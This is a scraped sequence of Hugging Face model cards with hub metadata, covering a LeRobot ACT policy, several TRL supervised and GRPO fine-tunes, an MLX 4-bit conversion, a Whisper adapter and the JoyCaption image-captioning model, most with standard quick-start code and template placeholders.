- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
Moritz7/model_3
|
Moritz7
| 2025-09-23T17:18:02Z | 32 | 0 |
lerobot
|
[
"lerobot",
"safetensors",
"robotics",
"act",
"dataset:Moritz7/dataset-8",
"arxiv:2304.13705",
"license:apache-2.0",
"region:us"
] |
robotics
| 2025-09-19T09:46:54Z |
---
datasets: Moritz7/dataset-8
library_name: lerobot
license: apache-2.0
model_name: act
pipeline_tag: robotics
tags:
- lerobot
- robotics
- act
---
# Model Card for act
<!-- Provide a quick summary of what the model is/does. -->
[Action Chunking with Transformers (ACT)](https://huggingface.co/papers/2304.13705) is an imitation-learning method that predicts short action chunks instead of single steps. It learns from teleoperated data and often achieves high success rates.
This policy has been trained and pushed to the Hub using [LeRobot](https://github.com/huggingface/lerobot).
See the full documentation at [LeRobot Docs](https://huggingface.co/docs/lerobot/index).
---
## How to Get Started with the Model
For a complete walkthrough, see the [training guide](https://huggingface.co/docs/lerobot/il_robots#train-a-policy).
Below is the short version on how to train and run inference/eval:
### Train from scratch
```bash
lerobot-train \
--dataset.repo_id=${HF_USER}/<dataset> \
--policy.type=act \
--output_dir=outputs/train/<desired_policy_repo_id> \
--job_name=lerobot_training \
--policy.device=cuda \
  --policy.repo_id=${HF_USER}/<desired_policy_repo_id> \
--wandb.enable=true
```
_Writes checkpoints to `outputs/train/<desired_policy_repo_id>/checkpoints/`._
### Evaluate the policy/run inference
```bash
lerobot-record \
--robot.type=so100_follower \
--dataset.repo_id=<hf_user>/eval_<dataset> \
--policy.path=<hf_user>/<desired_policy_repo_id> \
--episodes=10
```
Prefix the dataset repo with **eval\_** and supply `--policy.path` pointing to a local or hub checkpoint.
---
## Model Details
- **License:** apache-2.0
|
Vivek-Saurabh-241562584/gemma-4B-pt-arc-2025-text
|
Vivek-Saurabh-241562584
| 2025-09-23T17:15:39Z | 0 | 0 |
transformers
|
[
"transformers",
"tensorboard",
"safetensors",
"generated_from_trainer",
"trl",
"sft",
"base_model:google/gemma-3-4b-pt",
"base_model:finetune:google/gemma-3-4b-pt",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T16:55:31Z |
---
base_model: google/gemma-3-4b-pt
library_name: transformers
model_name: gemma-4B-pt-arc-2025-text
tags:
- generated_from_trainer
- trl
- sft
licence: license
---
# Model Card for gemma-4B-pt-arc-2025-text
This model is a fine-tuned version of [google/gemma-3-4b-pt](https://huggingface.co/google/gemma-3-4b-pt).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="Vivek-Saurabh-241562584/gemma-4B-pt-arc-2025-text", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with SFT.
### Framework versions
- TRL: 0.15.2
- Transformers: 4.56.1
- Pytorch: 2.8.0+cu126
- Datasets: 3.3.2
- Tokenizers: 0.22.0
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
aamijar/Llama-2-13b-hf-lora-r8-rte-epochs2
|
aamijar
| 2025-09-23T17:10:11Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T17:10:05Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
ChenWu98/numina_qwen_2.5_7b_sft_teachers_no_reasoning_source_split_0_2048_0.25
|
ChenWu98
| 2025-09-23T17:06:45Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"trl",
"sft",
"base_model:Qwen/Qwen2.5-7B",
"base_model:finetune:Qwen/Qwen2.5-7B",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T16:39:00Z |
---
base_model: Qwen/Qwen2.5-7B
library_name: transformers
model_name: numina_qwen_2.5_7b_sft_teachers_no_reasoning_source_split_0_2048_0.25
tags:
- generated_from_trainer
- trl
- sft
licence: license
---
# Model Card for numina_qwen_2.5_7b_sft_teachers_no_reasoning_source_split_0_2048_0.25
This model is a fine-tuned version of [Qwen/Qwen2.5-7B](https://huggingface.co/Qwen/Qwen2.5-7B).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="ChenWu98/numina_qwen_2.5_7b_sft_teachers_no_reasoning_source_split_0_2048_0.25", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/chenwu/huggingface/runs/dz0bo6z6)
This model was trained with SFT.
### Framework versions
- TRL: 0.19.1
- Transformers: 4.51.1
- Pytorch: 2.7.0
- Datasets: 4.0.0
- Tokenizers: 0.21.4
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
qurk41/KAT-Dev-mlx-4Bit
|
qurk41
| 2025-09-23T17:05:56Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen3",
"text-generation",
"mlx",
"conversational",
"multilingual",
"base_model:Kwaipilot/KAT-Dev",
"base_model:quantized:Kwaipilot/KAT-Dev",
"license:other",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"region:us"
] |
text-generation
| 2025-09-23T17:04:29Z |
---
language:
- multilingual
license: other
license_name: kwaipilot-license
license_link: LICENSE
library_name: transformers
tags:
- mlx
base_model: Kwaipilot/KAT-Dev
---
# qurk41/KAT-Dev-mlx-4Bit
The Model [qurk41/KAT-Dev-mlx-4Bit](https://huggingface.co/qurk41/KAT-Dev-mlx-4Bit) was converted to MLX format from [Kwaipilot/KAT-Dev](https://huggingface.co/Kwaipilot/KAT-Dev) using mlx-lm version **0.26.4**.
## Use with mlx
```bash
pip install mlx-lm
```
```python
from mlx_lm import load, generate
model, tokenizer = load("qurk41/KAT-Dev-mlx-4Bit")
prompt="hello"
if hasattr(tokenizer, "apply_chat_template") and tokenizer.chat_template is not None:
messages = [{"role": "user", "content": prompt}]
prompt = tokenizer.apply_chat_template(
messages, tokenize=False, add_generation_prompt=True
)
response = generate(model, tokenizer, prompt=prompt, verbose=True)
```
|
shrikantnaidu/SmolLM2-FT-MyDataset
|
shrikantnaidu
| 2025-09-23T17:05:37Z | 0 | 0 |
transformers
|
[
"transformers",
"tensorboard",
"safetensors",
"llama",
"text-generation",
"generated_from_trainer",
"sft",
"trl",
"smol-course",
"module_1",
"conversational",
"base_model:HuggingFaceTB/SmolLM2-135M",
"base_model:finetune:HuggingFaceTB/SmolLM2-135M",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T17:05:03Z |
---
base_model: HuggingFaceTB/SmolLM2-135M
library_name: transformers
model_name: SmolLM2-FT-MyDataset
tags:
- generated_from_trainer
- sft
- trl
- smol-course
- module_1
licence: license
---
# Model Card for SmolLM2-FT-MyDataset
This model is a fine-tuned version of [HuggingFaceTB/SmolLM2-135M](https://huggingface.co/HuggingFaceTB/SmolLM2-135M).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="shrikantnaidu/SmolLM2-FT-MyDataset", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/skn97/huggingface/runs/6lmdvmlb)
This model was trained with SFT.
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.1
- Pytorch: 2.8.0+cu126
- Datasets: 4.0.0
- Tokenizers: 0.22.0
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
lhkhiem28/MolT-Rex-DrugADMET-Lipophilicity-llasmol-llama-2-7b-sft
|
lhkhiem28
| 2025-09-23T17:05:03Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"hf_jobs",
"trl",
"sft",
"base_model:lhkhiem28/MolT-Rex-SMolInstruct-llama-2-7b-merged",
"base_model:finetune:lhkhiem28/MolT-Rex-SMolInstruct-llama-2-7b-merged",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T16:55:59Z |
---
base_model: lhkhiem28/MolT-Rex-SMolInstruct-llama-2-7b-merged
library_name: transformers
model_name: MolT-Rex-DrugADMET-Lipophilicity-llasmol-llama-2-7b-sft
tags:
- generated_from_trainer
- hf_jobs
- trl
- sft
licence: license
---
# Model Card for MolT-Rex-DrugADMET-Lipophilicity-llasmol-llama-2-7b-sft
This model is a fine-tuned version of [lhkhiem28/MolT-Rex-SMolInstruct-llama-2-7b-merged](https://huggingface.co/lhkhiem28/MolT-Rex-SMolInstruct-llama-2-7b-merged).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="lhkhiem28/MolT-Rex-DrugADMET-Lipophilicity-llasmol-llama-2-7b-sft", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/kle3/MolT-Rex/runs/rbyoe0wp)
This model was trained with SFT.
### Framework versions
- TRL: 0.22.2
- Transformers: 4.55.4
- Pytorch: 2.8.0
- Datasets: 3.6.0
- Tokenizers: 0.21.4
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
AzzamAhmed/whisper-arabic-egyptian-peft-84
|
AzzamAhmed
| 2025-09-23T17:00:49Z | 0 | 1 |
transformers
|
[
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T16:54:48Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
1038lab/llama-joycaption-alpha-two
|
1038lab
| 2025-09-23T17:00:22Z | 0 | 0 | null |
[
"safetensors",
"llava",
"captioning",
"base_model:google/siglip-so400m-patch14-384",
"base_model:finetune:google/siglip-so400m-patch14-384",
"region:us"
] | null | 2025-09-23T16:49:11Z |
---
base_model:
- meta-llama/Llama-3.1-8B-Instruct
- google/siglip-so400m-patch14-384
tags:
- captioning
---
# Model Card for Llama JoyCaption Alpha Two
[Github](https://github.com/fpgaminer/joycaption)
JoyCaption is an image captioning Visual Language Model (VLM) being built from the ground up as a free, open, and uncensored model for the community to use in training Diffusion models.
Key Features:
- **Free and Open**: It will be released for free, open weights, no restrictions, and just like [bigASP](https://www.reddit.com/r/StableDiffusion/comments/1dbasvx/the_gory_details_of_finetuning_sdxl_for_30m/), will come with training scripts and lots of juicy details on how it gets built.
- **Uncensored**: Equal coverage of SFW and NSFW concepts. No "cylindrical shaped object with a white substance coming out on it" here.
- **Diversity**: All are welcome here. Do you like digital art? Photoreal? Anime? Furry? JoyCaption is for everyone. Pains are being taken to ensure broad coverage of image styles, content, ethnicity, gender, orientation, etc.
- **Minimal Filtering**: JoyCaption is trained on large swathes of images so that it can understand almost all aspects of our world. almost. Illegal content will never be tolerated in JoyCaption's training.
## Motivation
Automated descriptive captions enable the training and finetuning of diffusion models on a wider range of images, since trainers are no longer required to either find images with already associated text or write the descriptions themselves. They also improve the quality of generations produced by Text-to-Image models trained on them (ref: DALL-E 3 paper). But to-date, the community has been stuck with ChatGPT, which is expensive and heavily censored; or alternative models, like CogVLM, which are weaker than ChatGPT and have abysmal performance outside of the SFW domain.
I'm building JoyCaption to help fill this gap by performing near or on-par with GPT4o in captioning images, while being free, unrestricted, and open.
## How to Get Started with the Model
Please see the [Github](https://github.com/fpgaminer/joycaption) for more details.
Example usage:
```python
import torch
from PIL import Image
from transformers import AutoProcessor, LlavaForConditionalGeneration
IMAGE_PATH = "image.jpg"
PROMPT = "Write a long descriptive caption for this image in a formal tone."
MODEL_NAME = "fancyfeast/llama-joycaption-alpha-two-hf-llava"
# Load JoyCaption
# bfloat16 is the native dtype of the LLM used in JoyCaption (Llama 3.1)
# device_map=0 loads the model into the first GPU
processor = AutoProcessor.from_pretrained(MODEL_NAME)
llava_model = LlavaForConditionalGeneration.from_pretrained(MODEL_NAME, torch_dtype="bfloat16", device_map=0)
llava_model.eval()
with torch.no_grad():
# Load image
image = Image.open(IMAGE_PATH)
# Build the conversation
convo = [
{
"role": "system",
"content": "You are a helpful image captioner.",
},
{
"role": "user",
"content": PROMPT,
},
]
# Format the conversation
# WARNING: HF's handling of chat's on Llava models is very fragile. This specific combination of processor.apply_chat_template(), and processor() works
# but if using other combinations always inspect the final input_ids to ensure they are correct. Often times you will end up with multiple <bos> tokens
# if not careful, which can make the model perform poorly.
convo_string = processor.apply_chat_template(convo, tokenize = False, add_generation_prompt = True)
assert isinstance(convo_string, str)
# Process the inputs
inputs = processor(text=[convo_string], images=[image], return_tensors="pt").to('cuda')
inputs['pixel_values'] = inputs['pixel_values'].to(torch.bfloat16)
# Generate the captions
generate_ids = llava_model.generate(
**inputs,
max_new_tokens=300,
do_sample=True,
suppress_tokens=None,
use_cache=True,
temperature=0.6,
top_k=None,
top_p=0.9,
)[0]
# Trim off the prompt
generate_ids = generate_ids[inputs['input_ids'].shape[1]:]
# Decode the caption
caption = processor.tokenizer.decode(generate_ids, skip_special_tokens=True, clean_up_tokenization_spaces=False)
caption = caption.strip()
print(caption)
```
## vLLM
vLLM provides the highest performance inference for JoyCaption, and an OpenAI compatible API so JoyCaption can be used like any other VLMs. Example usage:
```bash
vllm serve fancyfeast/llama-joycaption-alpha-two-hf-llava --max-model-len 4096 --enable-prefix-caching
```
VLMs are a bit finicky on vLLM, and vLLM is memory-hungry, so you may have to adjust settings for your particular environment, such as forcing eager mode, lowering `--max-model-len`, or tuning `--gpu-memory-utilization`.
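Once the server is up, JoyCaption can be queried like any other OpenAI-compatible VLM. The sketch below only builds the request body; the endpoint URL (`http://localhost:8000/v1/chat/completions`) and the multimodal `image_url` content part follow the standard chat-completions schema, and the default prompt mirrors the example above — adjust both for your deployment.

```python
# Minimal sketch of an OpenAI-compatible request body for a vLLM-served JoyCaption.
# Assumptions: vLLM is running at http://localhost:8000 (its default), and the
# served model name matches the HF repo id passed to `vllm serve`.
import json

def build_caption_request(
    image_url: str,
    prompt: str = "Write a long descriptive caption for this image in a formal tone.",
    model: str = "fancyfeast/llama-joycaption-alpha-two-hf-llava",
) -> str:
    """Serialize a /v1/chat/completions request body with one image and one text prompt."""
    body = {
        "model": model,
        "messages": [
            {"role": "system", "content": "You are a helpful image captioner."},
            {
                "role": "user",
                "content": [
                    {"type": "image_url", "image_url": {"url": image_url}},
                    {"type": "text", "text": prompt},
                ],
            },
        ],
        # Sampling settings matching the transformers example above.
        "max_tokens": 300,
        "temperature": 0.6,
        "top_p": 0.9,
    }
    return json.dumps(body)

payload = build_caption_request("https://example.com/image.jpg")
print(payload)
```

The resulting JSON can be POSTed with any HTTP client (`curl -d @- http://localhost:8000/v1/chat/completions`) or sent via the official `openai` Python client by passing the same `messages` list to `chat.completions.create`.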
|
AchyutaGH/Qwen2.5-0.5B-Instruct-Gensyn-Swarm-slender_grazing_ladybug
|
AchyutaGH
| 2025-09-23T16:59:51Z | 11 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen2",
"text-generation",
"generated_from_trainer",
"rl-swarm",
"grpo",
"gensyn",
"I am slender grazing ladybug",
"trl",
"genrl-swarm",
"I am slender_grazing_ladybug",
"conversational",
"arxiv:2402.03300",
"base_model:unsloth/Qwen2.5-0.5B-Instruct",
"base_model:finetune:unsloth/Qwen2.5-0.5B-Instruct",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-05-18T23:00:30Z |
---
base_model: unsloth/Qwen2.5-0.5B-Instruct
library_name: transformers
model_name: Qwen2.5-0.5B-Instruct-Gensyn-Swarm-slender_grazing_ladybug
tags:
- generated_from_trainer
- rl-swarm
- grpo
- gensyn
- I am slender grazing ladybug
- trl
- genrl-swarm
- I am slender_grazing_ladybug
licence: license
---
# Model Card for Qwen2.5-0.5B-Instruct-Gensyn-Swarm-slender_grazing_ladybug
This model is a fine-tuned version of [unsloth/Qwen2.5-0.5B-Instruct](https://huggingface.co/unsloth/Qwen2.5-0.5B-Instruct).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="AchyutaGH/Qwen2.5-0.5B-Instruct-Gensyn-Swarm-slender_grazing_ladybug", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.18.1
- Transformers: 4.52.4
- Pytorch: 2.7.1
- Datasets: 3.6.0
- Tokenizers: 0.21.1
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
Bossologist/Qwen3-4B-Instruct-2507_general_ft_lora
|
Bossologist
| 2025-09-23T16:58:46Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"unsloth",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T16:58:38Z |
---
library_name: transformers
tags:
- unsloth
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
